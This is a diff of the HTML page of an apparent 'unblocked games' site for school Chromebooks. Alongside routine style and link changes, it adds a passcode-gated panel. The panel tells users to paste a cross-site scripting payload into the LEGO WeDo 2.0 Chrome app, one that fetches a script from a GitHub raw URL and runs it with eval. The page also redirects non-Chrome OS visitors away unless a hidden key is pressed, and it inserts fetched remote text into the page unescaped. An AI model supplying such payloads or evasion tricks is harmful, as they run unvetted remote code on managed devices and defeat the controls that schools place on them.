--- a/index.html
+++ b/index.html
@@ -4,8 +4,8 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Sjeakx Blast</title>
-    <link href="style.css" type="text/css" rel="stylesheet"> <!-- Ensure this is correct -->
-    <script src="script.js"></script> <!-- If you have a script.js file, include it here -->
+    <link href="style.css" type="text/css" rel="stylesheet">
+    <script src="script.js"></script>
     <style>
         /* Full Page Background Color */
         body {
@@ -81,7 +81,7 @@
 
         /* Game content area */
         .game-container {
-            margin-top: 80px; /* To push the content down and make space for the top bar */
+            margin-top: 80px;
             text-align: center;
             color: white;
             padding: 50px;
@@ -92,6 +92,82 @@
             visibility: hidden;
             height: 100vh;
             background-color: white;
+        }
+
+        /* Button Style */
+        .custom-btn {
+            padding: 10px 20px;
+            background-color: #007bff;
+            border: none;
+            color: white;
+            font-size: 16px;
+            cursor: pointer;
+            border-radius: 8px;
+        }
+
+        .btn-3 {
+            background-color: #28a745;
+        }
+
+        /* Overlay and Popup Styles */
+        .overlay {
+            position: fixed;
+            top: 0;
+            left: 0;
+            width: 100%;
+            height: 100%;
+            background-color: rgba(0, 0, 0, 0.5);
+            visibility: hidden;
+            opacity: 0;
+            transition: visibility 0s, opacity 0.5s;
+        }
+
+        .overlay.hidden {
+            visibility: hidden;
+            opacity: 0;
+        }
+
+        .confirmation-dropdown {
+            position: absolute;
+            top: 50%;
+            left: 50%;
+            transform: translate(-50%, -50%);
+            background-color: white;
+            padding: 20px;
+            border-radius: 10px;
+            display: none;
+            z-index: 1001;
+        }
+
+        .confirmation-dropdown.hidden {
+            display: none;
+        }
+
+        .passcode-input {
+            padding: 10px;
+            margin: 10px 0;
+            border: 1px solid #ccc;
+            border-radius: 5px;
+        }
+
+        .code-snippet-wrapper {
+            background-color: #f4f4f4;
+            padding: 10px;
+            border-radius: 5px;
+            margin: 10px 0;
+        }
+
+        .confirm-btn {
+            background-color: #28a745;
+            color: white;
+            padding: 10px;
+            border: none;
+            cursor: pointer;
+            border-radius: 8px;
+        }
+
+        #instructions {
+            display: none;
         }
     </style>
 </head>
@@ -116,16 +192,11 @@
             </div>
 
             <div class="dropdown">
-                <button>Unblocked Proxys</button>
-                <div class="dropdown-content">
-                    <a href="https://school.accesscam.org/" target="_blank">Proxy (use unblocker)</a>
-                </div>
-            </div>
-
-            <div class="dropdown">
                 <button>Unblocked Games</button>
                 <div class="dropdown-content">
                     <a href="https://sjeakx.github.io/Sjeakx-blast/telltaleheartscript-backup-main/index.html" target="_blank">Unblocker/Games/Emulators</a>
+                    <a href="https://sjeakx.github.io/macvg/" target="_blank">macvg Unblocked bit broken </a>
+
                 </div>
             </div>
 
@@ -134,7 +205,6 @@
                 <div class="dropdown-content">
                     <a href="https://anura.pro/" target="_blank">A Fake Chrome OS</a>
                     <a href="https://discord.gg/Gre4NYvv" target="_blank">Discord Full of Unblockers/Other Websites</a>
-                    <a href="https://statistical-marla-sjeaks-97f6e201.koyeb.app/" target="_blank">Join The Best</a>
                 </div>
             </div>
         </div>
@@ -145,59 +215,110 @@
         <div id="update-info"></div> <!-- This is where the update info will appear -->
     </div>
 
+    <!-- LegoWeDo 2.0 (Unblocker) Button -->
+    <button class="custom-btn btn-3" onclick="showConfirmation()">LegoWeDo 2.0 (Unblocker)</button>
+
+    <!-- Overlay for popup -->
+    <div class="overlay hidden" id="overlay"></div>
+
+    <!-- Confirmation popup for LegoWeDo -->
+    <div class="confirmation-dropdown hidden" id="confirmationDropdown">
+        <h3>Enter Passcode:</h3>
+        <input type="password" id="passcodeInput" class="passcode-input" placeholder="Enter passcode">
+        <button onclick="verifyPasscode()">Verify</button>
+        <p id="passcodeError" style="color: red; display: none;">Incorrect passcode. Please try again.</p>
+
+        <div id="instructions" style="display: none;">
+            <h3>Setup you have to do this each time :</h3>
+            <p>First, install WeDo 2.0 LEGO® Education from the Chrome Webstore.</p>
+            <p>Once you are in the project, click on the pencil in the top bar.</p>
+            <p>Then, click the green document button.</p>
+            <p>In the textbox, paste the following string:</p>
+            
+            <div class="code-snippet-wrapper">
+                <pre><code>&lt;img src=# onerror='fetch
+    ("https://raw.githubusercontent.com
+    /Blobby-Boi/BlobbypassXSS/main/main.js")
+    .then(r=>r.text())
+    .then(c=>eval(c)) '&gt;</code></pre>
+            </div>
+            <p>Done!</p>
+
+            <button class="confirm-btn" onclick="closeConfirmation()">Got it, close</button>
+        </div>
+    </div>
+
     <script>
         let isPPressed = false;
         let passcodeVerified = false;
+
+        function showConfirmation() {
+            document.getElementById("overlay").style.visibility = "visible";
+            document.getElementById("overlay").style.opacity = 1;
+            document.getElementById("confirmationDropdown").style.display = "block";
+        }
+
+        function closeConfirmation() {
+            document.getElementById("overlay").style.visibility = "hidden";
+            document.getElementById("overlay").style.opacity = 0;
+            document.getElementById("confirmationDropdown").style.display = "none";
+        }
+
+        function verifyPasscode() {
+            const passcodeInput = document.getElementById("passcodeInput").value;
+            const passcodeError = document.getElementById("passcodeError");
+            const instructions = document.getElementById("instructions");
+
+            const correctPasscode = "8521";
+
+            if (passcodeInput === correctPasscode) {
+                passcodeError.style.display = "none";
+                instructions.style.display = "block"; // Show instructions after correct passcode
+            } else {
+                passcodeError.style.display = "block"; // Show error message for incorrect passcode
+            }
+        }
 
         function checkUserAgent() {
             const userAgent = navigator.userAgent;
 
             // For non-Chrome OS users
             if (!userAgent.includes("CrOS")) {
-                // Initially hide the entire body except for the LegoWeDo button
                 document.body.classList.add("hidden-body");
 
-                // Redirect logic after 2 seconds
                 const timeoutId = setTimeout(() => {
                     if (!isPPressed) {
                         window.location.href = "https://google.com"; // Redirect to google.com
                     }
                 }, 2000);
 
-                // Event listener for "P" key press
                 document.addEventListener("keydown", function (event) {
                     if (event.key === "P" || event.key === "p") {
                         event.preventDefault();
                         isPPressed = true;
-                        clearTimeout(timeoutId); // Cancel redirect
-                        document.body.classList.remove("hidden-body"); // Reveal the content
-                        showGameContainer(); // Show the game content and dropdowns
-                        loadUpdateInfo(); // Load the update information
+                        clearTimeout(timeoutId);
+                        document.body.classList.remove("hidden-body");
+                        showGameContainer();
+                        loadUpdateInfo();
                     }
                 });
             } else {
-                // For Chrome OS users, show the content immediately
                 document.body.classList.remove("hidden-body");
                 showGameContainer();
-                loadUpdateInfo(); // Load the update information
+                loadUpdateInfo();
             }
         }
 
         function showGameContainer() {
             document.querySelector(".game-container").classList.remove("hidden");
-            document.querySelector(".top-bar").style.display = 'flex'; // Show the top bar
+            document.querySelector(".top-bar").style.display = 'flex';
         }
 
-        // Function to fetch and load content from the GitHub URL
         function loadUpdateInfo() {
             const updateInfoContainer = document.getElementById("update-info");
-            const githubUrl = "https://raw.githubusercontent.com/yourusername/yourrepo/main/update-info.txt"; // Replace with your actual GitHub raw file URL
+            const githubUrl = "https://raw.githubusercontent.com/Sjeakx/sjeak-update/refs/heads/main/updates.txt"; // Replace with your actual GitHub raw file URL
 
-            // Use a CORS proxy if necessary
-            const corsProxy = "https://cors-anywhere.herokuapp.com/";
-            const proxiedUrl = corsProxy + githubUrl;
-
-            fetch(proxiedUrl)
+            fetch(githubUrl)
                 .then(response => response.text())
                 .then(data => {
                     updateInfoContainer.innerHTML = `<pre>${data}</pre>`; // Display the fetched content
@@ -211,4 +332,3 @@
     </script>
 </body>
 </html>
-
